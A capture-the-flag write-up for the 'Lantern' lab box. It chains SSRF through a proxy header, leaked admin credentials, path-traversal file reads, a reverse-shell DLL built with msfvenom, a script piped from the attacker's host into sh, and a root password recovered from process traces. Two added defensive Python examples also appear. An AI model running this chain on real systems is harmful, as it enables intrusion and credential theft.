Lantern

Recon

nmap_scan.log
└─$ grep lant /etc/hosts
10.129.65.97    lantern.htb

HTTP (80) [Enum]

A simple website serving some HTML. The Vacancies page seems interesting: uploading a file whose name ends with .pdf returns "Thank you! We will conact you very soon!"

Writeup.png

No subdomains or interesting files found on port 80.

└─$ feroxbuster -u http://lantern.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://lantern.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      238l      676w    10713c http://lantern.htb/vacancies
200      GET       81l      384w    31614c http://lantern.htb/static/images/avatar-1.jpg
200      GET       85l      485w    41045c http://lantern.htb/static/images/avatar-2.jpg
200      GET      126l      692w    55960c http://lantern.htb/static/images/blog-3.jpg
200      GET      155l     1017w    81167c http://lantern.htb/static/images/blog-1.jpg
200      GET      484l     2406w   189281c http://lantern.htb/static/images/about-2.jpg
200      GET      146l      918w    76869c http://lantern.htb/static/images/blog-2.jpg
200      GET      150l      735w    60143c http://lantern.htb/static/images/about.jpg
200      GET      191l     1227w   106995c http://lantern.htb/static/images/about-1.jpg
200      GET       93l      615w    59733c http://lantern.htb/static/images/avatar.jpg
200      GET    11810l    23508w   243203c http://lantern.htb/static/css/style.css
200      GET      225l      836w    12049c http://lantern.htb/
405      GET        5l       20w      153c http://lantern.htb/submit
200      GET       60l      128w     1650c http://lantern.htb/static/js/main.js
[####################] - 4m     30021/30021   0s      found:14      errors:3
[####################] - 4m     30000/30000   142/s   http://lantern.htb/

The file upload only accepted PDFs. I tried uploading malicious payloads (malicious-pdf) but got no callback, and XSS didn't work either.

HTTP (3000) [Enum]

Some kind of Admin panel which seems to be using Blazor

Writeup-1.png

Hmmm..

Writeup-2.png

Communication happens on Websockets?

Writeup-3.png

Feroxbuster with common.txt wordlist found /error

Writeup-4.png

In the response headers we get Server: Kestrel too.

HTTP (80)

Skipper Proxy

Port 80 also runs on Blazor, and the response headers have Server: Skipper Proxy

    <script src="_framework/blazor.webassembly.js"></script>

Skipper is vulnerable to SSRF via the X-Skipper-Proxy header:

└─$ ffuf -u 'http://lantern.htb/' -w ports -H 'X-Skipper-Proxy: http://127.0.0.1:FUZZ'
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://lantern.htb/
 :: Wordlist         : FUZZ: /home/woyag/Desktop/Rooms/Lantern/ports
 :: Header           : X-Skipper-Proxy: http://127.0.0.1:FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

22                      [Status: 500, Size: 22, Words: 3, Lines: 2, Duration: 102ms]
80                      [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 85ms]
3000                    [Status: 200, Size: 2847, Words: 334, Lines: 58, Duration: 191ms]
5000                    [Status: 200, Size: 1669, Words: 389, Lines: 50, Duration: 77ms]
8000                    [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 78ms]
:: Progress: [24032/65000] :: Job [1/1] :: 552 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
[WARN] Caught keyboard interrupt (Ctrl-C)

Looks like SSRF is valid.

While searching around for common Blazor files I came across chanan/BlazorStyled/docs/_framework, which had interesting files such as JSON files. On the target these files were not readable unless we used the X-Skipper-Proxy header:

└─$ curl http://lantern.htb/_framework/blazor.boot.json
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
└─$ curl http://lantern.htb/_framework/blazor.boot.json -H 'X-Skipper-Proxy: http://127.0.0.1:5000'
{
  "cacheBootResources": true,
  "config": [ ],
  "debugBuild": true,
  "entryAssembly": "InternaLantern",
  "icuDataMode": 0,
  "linkerEnabled": false,
  "resources": {
    "assembly": {
      ...
      "InternaLantern.dll": "sha256-pblWkC\/PhCCSxn1VOi3fajA0xS3mX\/\/RC0XvAE\/n5cI="
    },
    "extensions": null,
    "lazyAssembly": null,
    "libraryInitializers": null,
    "pdb": {
      "InternaLantern.pdb": "sha256-E8WICkNg65vorw8OEDOe6K9nJxL0QSt1S4SZoX5rTOY="
    },
    "runtime": {
      "dotnet.timezones.blat": "sha256-KsGUR9nqtXb3Hy6IrNlnc1HoSS+AFlsXTX9rq4oChtA=",
      "icudt.dat": "sha256-Zuq0dWAsBm6\/2lSOsz7+H9PvFaRn61KIXHMMwXDfvyE=",
      "icudt_CJK.dat": "sha256-WPyI4hWDPnOw62Nr27FkzGjdbucZnQD+Ph+GOPhAedw=",
      "icudt_EFIGS.dat": "sha256-4RwaPx87Z4dvn77ie\/ro3\/QzyS+\/gGmO3Y\/0CSAXw4k=",
      "icudt_no_CJK.dat": "sha256-OxylFgLJlFqixsj+nLxYVsv5iZLvfIKMpLf9hrWaChA=",
      "dotnet.wasm": "sha256-JlqjjT2GZWeJko9+pitVfjjmJeEbi4AibzTQr5zTISo=",
      "dotnet..lzvsyl6wav.js": "sha256-6AcYHsbEEdBjeNDUUvrQZuRqASd62mZgQgxz4uzTVGU="
    },
    "satelliteResources": null
  }
} 
└─$ curl http://lantern.htb/_framework/blazor.boot.json -H 'X-Skipper-Proxy: http://127.0.0.1:5000' -s | grep -vE '"(Microsoft|System|SQL|Rad)' | grep dll
      "WindowsBase.dll": "sha256-k04wZob3UNWysInC\/KRbcfiSMMSXDv56yL6raT6AnZk=",
      "mscorlib.dll": "sha256-veli+XvWHzkA3s4t4DKI+XiyNMpfHQjiO002+ExANkU=",
      "netstandard.dll": "sha256-O9JhHo5KqxkmwmapuxuhG\/iMRV7RHcrCDO9z+yv+8yI=",
      "InternaLantern.dll": "sha256-pblWkC\/PhCCSxn1VOi3fajA0xS3mX\/\/RC0XvAE\/n5cI="
└─$ curl http://lantern.htb/_framework/InternaLantern.dll -H 'X-Skipper-Proxy: http://127.0.0.1:5000' -Os
Writeup-5.png
Uid = "JFMDK",
Name = "John",
InternalInfo = "SGVhZCBvZiBzYWxlcyBkZXBhcnRtZW50LCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBqb2huLnNAZXhhbXBsZS5jb20="

Uid = "PPAOS",
Name = "Anny",
InternalInfo = "SFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGFubnkudEBleGFtcGxlLmNvbQ=="

Uid = "UAYWP",
Name = "Catherine",
InternalInfo = "RnVsbFN0YWNrIGRldmVsb3BlciwgZW1lcmdlbmN5IGNvbnRhY3Q6ICs0NDEyMzQ1Njc4LCBlbWFpbDogY2F0aGVyaW5lLnJAZXhhbXBsZS5jb20="

Uid = "GMNZQ",
Name = "Lara",
InternalInfo = "UFIsIGVtZXJnZW5jeSBjb250YWN0OiArNDQxMjM0NTY3OCwgZW1haWw6IGxhcmEuc0BleGFtcGxlLmNvbQ=="

Uid = "XZCSF",
Name = "Lila",
InternalInfo = "SnVuaW9yIC5ORVQgZGV2ZWxvcGVyLCBlbWVyZ2VuY3kgY29udGFjdDogKzQ0MTIzNDU2NzgsIGVtYWlsOiBsaWxhLnNAZXhhbXBsZS5jb20="

Uid = "POMBS",
Name = "Travis",
InternalInfo = "U3lzdGVtIGFkbWluaXN0cmF0b3IsIEZpcnN0IGRheTogMjEvMS8yMDI0LCBJbml0aWFsIGNyZWRlbnRpYWxzIGFkbWluOkFKYkZBX1FAOTI1cDlhcCMyMi4gQXNrIHRvIGNoYW5nZSBhZnRlciBmaXJzdCBsb2dpbiE="
Writeup-6.png
System administrator, First day: 21/1/2024, Initial credentials admin:AJbFA_Q@925p9ap#22. Ask to change after first login!
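
The InternalInfo values above are base64, which is an encoding and not protection, and the assembly holding them is downloadable by any client. An added example (not from the original writeup or the application): a pre-release check that scans decompiled or source text for base64 string literals that decode to readable text and flags credential-like wording. The sample input, keyword list and function names are constructed for illustration.

```python
import base64
import binascii
import re

# Quoted string literals made only of base64 characters, long enough to be data.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{24,}={0,2})"')
# Assumed keyword list: wording that makes a decoded string worth a manual review.
KEYWORDS = re.compile(r"credential|password|passwd|secret|token|api[_-]?key", re.I)


def decode_text(literal):
    """Strictly decode a base64 literal; return str only if it is printable UTF-8."""
    if len(literal) % 4:
        return None
    try:
        raw = base64.b64decode(literal, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_source(source):
    """Return one finding per base64 literal that decodes to readable text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in B64_LITERAL.finditer(line):
            text = decode_text(match.group(1))
            if text is None:
                continue  # binary data or not really base64: ignore
            findings.append({
                "line": lineno,
                "decoded": text,
                "sensitive": bool(KEYWORDS.search(text)),
            })
    return findings


def _b64(plaintext):
    return base64.b64encode(plaintext.encode()).decode()


# Constructed sample in the shape of the decompiled initialisers shown above.
SAMPLE_SOURCE = "\n".join([
    'Uid = "AAAAA",',
    'Name = "Alice",',
    f'InternalInfo = "{_b64("HR, emergency contact: +000000000, email: alice@example.com")}"',
    "",
    'Uid = "BBBBB",',
    'Name = "Bob",',
    f'InternalInfo = "{_b64("System administrator, initial credentials svc:EXAMPLE-ONLY. Change after first login!")}"',
])

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_SOURCE):
        tag = "SENSITIVE" if finding["sensitive"] else "readable"
        print(f'line {finding["line"]}: [{tag}] {finding["decoded"]}')
```

Run it over the decompiled output of every assembly listed in blazor.boot.json before publishing; anything it flags belongs behind a server-side API, not in the client bundle.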

Internal

Note: With the proxy header set, we can see all DLLs used by the Blazor application in the Network tab.

Add the X-Skipper-Proxy header to Burp requests and we are then able to see the internal pages of the website.

Writeup-9.png

SQLi

Book vacation is vulnerable to SQLi.

Writeup-10.png

Since this is a .NET application I assumed the database was MSSQL, but it's sqlite3?!

Writeup-11.png

110% rabbit hole as database is controlled by Javascript 💀

HTTP (3000) [Admin]

Creds: admin:AJbFA_Q@925p9ap#22

Admin Dashboard

Writeup-7.png

File Upload

If we try to upload a web shell via Upload Content, we can't activate it because it comes back with Content-Type: application/octet-stream

Writeup-8.png

Source

In Files we can get the source of the app:

from flask import Flask, render_template, send_file, request, redirect, json
from werkzeug.utils import secure_filename
import os

app=Flask("__name__")

@app.route('/')
def index():
    if request.headers['Host'] != "lantern.htb":
        return redirect("http://lantern.htb/", code=302)
    return render_template("index.html")

@app.route('/vacancies')
def vacancies():
    return render_template('vacancies.html')

@app.route('/submit', methods=['POST'])
def save_vacancy():
    name = request.form.get('name')
    email = request.form.get('email')
    vacancy = request.form.get('vacancy', default='Middle Frontend Developer')

    if 'resume' in request.files:
        try:
            file = request.files['resume']
            resume_name = file.filename
            if resume_name.endswith('.pdf') or resume_name == '':
                filename = secure_filename(f"resume-{name}-{vacancy}-latern.pdf")
                upload_folder = os.path.join(os.getcwd(), 'uploads')
                destination = '/'.join([upload_folder, filename])
                file.save(destination)
            else:
                return "Only PDF files allowed!"
        except:
            return "Something went wrong!"
    return "Thank you! We will conact you very soon!"

@app.route('/PrivacyAndPolicy')
def sendPolicyAgreement():
    lang = request.args.get('lang')
    file_ext = request.args.get('ext')
    try:
            return send_file(f'/var/www/sites/localisation/{lang}.{file_ext}') 
    except: 
            return send_file(f'/var/www/sites/localisation/default/policy.pdf', 'application/pdf')

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8000)

LFI

LFI successful

└─$ curl 'http://lantern.htb/PrivacyAndPolicy?lang=./&ext=./../../../etc/hosts' -o-
127.0.0.1 localhost lantern.htb
127.0.1.1 lantern

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
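
The /PrivacyAndPolicy handler interpolates both query parameters straight into the path, so lang=./ combined with ext=./../../../etc/hosts walks out of the localisation directory. An added example, not part of the recovered application source, showing the original path construction next to a hardened resolver; the allowlists and the function names are assumptions, since the real set of localisation files is not shown.

```python
import os
import re

BASE_DIR = "/var/www/sites/localisation"   # directory used by the original handler
DEFAULT_POLICY = os.path.join(BASE_DIR, "default", "policy.pdf")

# Assumed allowlists (hypothetical): language codes like "en" or "en-GB", few extensions.
ALLOWED_LANGS = re.compile(r"[a-z]{2}(?:-[A-Z]{2})?")
ALLOWED_EXTS = {"pdf", "txt", "html"}


def vulnerable_path(lang, file_ext):
    """Path exactly as the original handler builds it (no validation)."""
    return f"{BASE_DIR}/{lang}.{file_ext}"


def escapes_base(path, base_dir=BASE_DIR):
    """True when the normalised path lands outside base_dir."""
    base = os.path.normpath(base_dir)
    return os.path.commonpath([base, os.path.normpath(path)]) != base


def safe_policy_path(lang, file_ext, base_dir=BASE_DIR):
    """Return an absolute path inside base_dir, or None if the request is rejected."""
    # 1. Syntactic allowlist: neither value may contain separators or dots.
    if not isinstance(lang, str) or not ALLOWED_LANGS.fullmatch(lang):
        return None
    if file_ext not in ALLOWED_EXTS:
        return None
    # 2. Containment check after resolving ".." and symlinks (defence in depth).
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, f"{lang}.{file_ext}"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# In the Flask handler this would replace the f-string, for example:
#     path = safe_policy_path(lang, file_ext) or DEFAULT_POLICY
#     return send_file(path)

if __name__ == "__main__":
    # The two requests from the writeup, replayed against both path builders.
    requests_seen = [
        ("./", "./../../../etc/hosts"),
        ("./", "./../../../opt/components/FileUpload.dll"),
        ("en", "pdf"),
    ]
    for lang, ext in requests_seen:
        raw = vulnerable_path(lang, ext)
        print(f"lang={lang!r} ext={ext!r}")
        print(f"  original : {os.path.normpath(raw)} (escapes: {escapes_base(raw)})")
        print(f"  hardened : {safe_policy_path(lang, ext)}")
```

The allowlist alone stops the traversal shown above; the realpath containment check additionally covers a symlink planted inside the localisation directory.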

There's a database somewhere...

        SqliteDbContextOptionsBuilderExtensions.UseSqlite(optionsBuilder, "Data Source=Data.db", (Action<SqliteDbContextOptionsBuilder>)null).UseLoggerFactory(LoggerFactory.Create(delegate(ILoggingBuilder builder)

I tried getting the programs' cmdlines, but for whatever reason they were empty.. almost all PIDs.......

Components

If we enter an incorrect module name, we get the path to the components:

Writeup-12.png
└─$ for file in {FileUpload,FileTree,Logs,HealthCheck,Resumes}; do curl "http://lantern.htb/PrivacyAndPolicy?lang=./&ext=./../../../opt/components/$file.dll" -so "$file.dll"; done;
└─$ file *
FileTree.dll:    PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
FileUpload.dll:  PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
HealthCheck.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
Logs.dll:        PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
Resumes.dll:     PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

Craft malicious payload:

└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o rev.dll

I tried changing the path as the file was being uploaded, but wasn't able to get it into the components directory. If we reverse the process and point to the images directory, another error happens.

Writeup-13.png

Most probably no permission to read the file..

└─$ curl 'http://lantern.htb/PrivacyAndPolicy?lang=./&ext=./../../../home/tomas/LanternAdmin/bin/Debug/net6.0/LanternAdmin.dll' -so- | head -c 9
%PDF-1.4

It also seems case sensitive.

Writeup-14.png

SHEEEEEEEEEEEEEEEEEEEEEH!! After so much blood and sweat finally managed to get the right DLL type to get reverse shell.

Generate the DLL like so: https://www.c-sharpcorner.com/UploadFile/1e050f/creating-and-using-dll-class-library-in-C-Sharp/

The payload is the Revshells C# TCP Client from https://www.revshells.com

ReverseShellDLL.cs

Project version and settings.

<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="Microsoft.AspNetCore.Components" Version="6.0.25" />
  </ItemGroup>
</Project>

Note: Not positive if Microsoft.AspNetCore.Components was required.

Compile that bitch and upload. Make sure to use the BTP Burp extension while editing or it might not work.

Writeup-16.png

Trigger the payload via Choose module and BAM, reverse shell babyyyyy!

../../../../../../../opt/components/Rev.dll
Writeup-15.png

Reverse Shell

script /dev/null -qc /bin/bash
tomas@lantern:~/LanternAdmin$ id
uid=1000(tomas) gid=1000(tomas) groups=1000(tomas)

User.txt

tomas@lantern:~$ cat user.txt
ef5c1abf2183258b5ab9286fb8ad6930

Privilege Escalation

To get a proper shell, add your public key to .ssh/authorized_keys and SSH into the box.

└─$ ssh tomas@10.129.131.78 -i ssh/tomas/id_rsa
tomas@lantern:~$ sudo -l
Matching Defaults entries for tomas on lantern:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User tomas may run the following commands on lantern:
    (ALL : ALL) NOPASSWD: /usr/bin/procmon
tomas@lantern:~$ curl 10.10.14.22/lp.sh|sh|tee /dev/shm/lp.log
...
╔══════════╣ Mails (limit 50)
    20774      4 -rw-r--r--   1 tomas    mail          539 Jul 31 12:00 /var/mail/tomas
    20774      4 -rw-r--r--   1 tomas    mail          539 Jul 31 12:00 /var/spool/mail/tomas
...
tomas@lantern:/var/mail$ cat tomas
From hr@lantern.htb Mon Jan 1 12:00:00 2023
Subject: Welcome to Lantern!

Hi Tomas,

Congratulations on joining the Lantern team as a Linux Engineer! We're thrilled to have you on board.

While we're setting up your new account, feel free to use the access and toolset of our previous team member. Soon, you'll have all the access you need.

Our admin is currently automating processes on the server. Before global testing, could you check out his work in /root/automation.sh? Your insights will be valuable.

Exciting times ahead!

Best.

Gather data about the process. After running the program for some time, the top 2 syscalls were read and write, so export only those:

tomas@lantern:~$ sudo /usr/bin/procmon -p $(pgrep -f automation) -e read,write 
Writeup-17.png

Note: It's better to add the -c flag and specify the output file from the CLI. F6 export works too; there is no confirmation of the save, but the file is saved in the cwd.

Binary: ProcMon-for-Linux

scp -i ../ssh/tomas_box/id_rsa tomas@10.129.240.35:./procmon_2024-08-18_14:42:46.db procmon.db
sqlite3 ./procmon.db "SELECT HEX(arguments) FROM ebpf WHERE syscall LIKE '%write%';" > write_data.txt
while read -r line; do echo $line | xxd -r -p >> write_data_decoded.txt; done <write_data.txt;
sqlite3 ./procmon.db "SELECT HEX(arguments) FROM ebpf WHERE syscall LIKE '%read%';" > read_data.txt
while read -r line; do echo $line | xxd -r -p >> read_data_decoded.txt; done <read_data.txt;
strings write_data_decoded.txt -n1 > write_data_decoded.strings.txt
strings read_data_decoded.txt -n1 > read_data_decoded.strings.txt
cat write_data_decoded.strings.txt | sort | uniq -c | sort -nr
cat read_data_decoded.strings.txt | sort | uniq -c | sort -nr
└─$ cat write_data_decoded.strings.txt | sort | uniq -c | sort -nr
   9470 (Becho4C(B Re
   4631 [?25l
   3095 [?25h
   1574 U
   1032 echo4C(B Re
    560 5
    529 u
    432 [?25l1B
    408 [?25h1B
    344 *
    286 [m
    284 (B
    190 d[?25h
    186 &
    172 M
    132 0
    132 `
     96 3[?25h
     94 p[?25h
     93 6H
     92 u[?25h
     91  [?25h
     79 I
     79 [?25lH(Becho4C(B Re
     66 y
     66 S5
     66 Pv5
     66 pA5
     66 p
     66 m5
     66 @J5
     66 g
     66 d5
     66 [5
     66
     60 e
     60 [1B
     50 [?25hH(Becho4C(B Re
     48 w[?25h
     48 t[?25h
     48  Q?25h
     48 M[?25h
     48 [K
     48 h[?25h1B
     48 e[?25h1B
     48 E[?25h
     48 c[?25h1B
     48
     46  s?25h
     46 s[?25h
     46 o[?25h
     46 k[?25h
     46 h[?25h
     46 c[?25h
     46 B[?25h
     46 b[?25h
     46 a[?25h
     46 /[?25h
     46 .[?25h
     46  .?25h
     46 [1Bl
     31  _
     24 [0;1m
     23 [A25l
     23 85
     22  |?25h
     19 [
     16 Becho4C(B Re
     16 [24;1H
     13 [H
     10 [?7h
     10 [4l
      8 Received SIGHUP or S
      6 B Re
      6 [?2004l
      6 [1Be
      3 f
      3 (B  GNU nano
      3 [?2004h
      3 [0;7m
      2 u[?25hH(Becho4C(B Re
      2 s[?25hH(Becho4C(B Re
      2 p[?25hH(Becho4C(B Re
      2 k[?25hH(Becho4C(B Re
      2 h[?25hH(Becho4C(B Re
      2 c[?25hH(Becho4C(B Re
      2 (BH(Becho4C(B Re
      2 b[?25hH(Becho4C(B Re
      2 a[?25hH(Becho4C(B Re
      2 /[?25hH(Becho4C(B Re
      2 .[?25hH(Becho4C(B Re
      2  .?25hH(Becho4C(B Re
      2 [1BlH(Becho4C(B Re
      1 [A25lH(Becho4C(B Re
      1  [?25hH(Becho4C(B Re
      1 [?25h4C(B Re
      1 [1;24r

There are a lot of suspicious patterns like {CHAR}[?25h; following up on that, I filtered the stream:

└─$ cat write_data_decoded.strings.txt | grep '\[\?25h' | sed -E 's/\s*\[?\?25h\s*//g' | tr -d '\n'
 s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMM4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B Re .H(Becho4C(B Re .H(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B Re/H(Becho4C(B Re/H(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RebH(Becho4C(B RebH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReaH(Becho4C(B ReaH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RecH(Becho4C(B RecH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RekH(Becho4C(B RekH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReuH(Becho4C(B ReuH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RepH(Becho4C(B RepH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B Re.H(Becho4C(B Re.H(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ResH(Becho4C(B ResH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B ReH(Becho4C(B RehH(Becho4C(B RehH(Becho4C(B ReH(Becho4C(B 
Re1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB | s suuddoo . .//bbaacckkuupp..sshh1B1B1B1Be1Be1B1B1B1B1Bc1Bc1B1B1B1B1Bh1Bh1B1B1B1B1B1B Q Q33EEddddttddww33ppMMBB 

Nice, it's actual lines that nano is writing!

Split the stream on the word suuddoo, take a single line and delete the repeated chars:

sudo ../backup.sh echo Q3Eddtdw3pMB
tomas@lantern:~$ su
Password: Q3Eddtdw3pMB
root@lantern:~# id
uid=0(root) gid=0(root) groups=0(root)
root@lantern:/home/tomas# cd /root

Root.txt

root@lantern:~# cat root.txt
9120fae6ebd342b55db50d2f86966df2

Root scripts

root@lantern:~# cat cleanup.sh
#!/bin/bash

# Directory to clean up in /opt/components
DIR_COMPONENTS="/opt/components"

# Files to exclude in /opt/components
EXCLUDE_FILES_COMPONENTS=("FileTree.dll" "FileUpload.dll" "HealthCheck.dll" "Logs.dll" "Resumes.dll")

# Convert exclude files array to a pattern for grep
EXCLUDE_PATTERN_COMPONENTS=$(/usr/bin/printf "|%s" "${EXCLUDE_FILES_COMPONENTS[@]}")
EXCLUDE_PATTERN_COMPONENTS=${EXCLUDE_PATTERN_COMPONENTS:1}  # Remove leading '|'

# Find and delete files not in the exclude list in /opt/components
/usr/bin/find "$DIR_COMPONENTS" -type f | /usr/bin/grep -Ev "$EXCLUDE_PATTERN_COMPONENTS" | while read -r file; do
    /bin/rm -f "$file"
done

# Directory to clean up in /var/www/sites/lantern.htb/static/images
DIR_IMAGES="/var/www/sites/lantern.htb/static/images"

# Files to exclude in /var/www/sites/lantern.htb/static/images
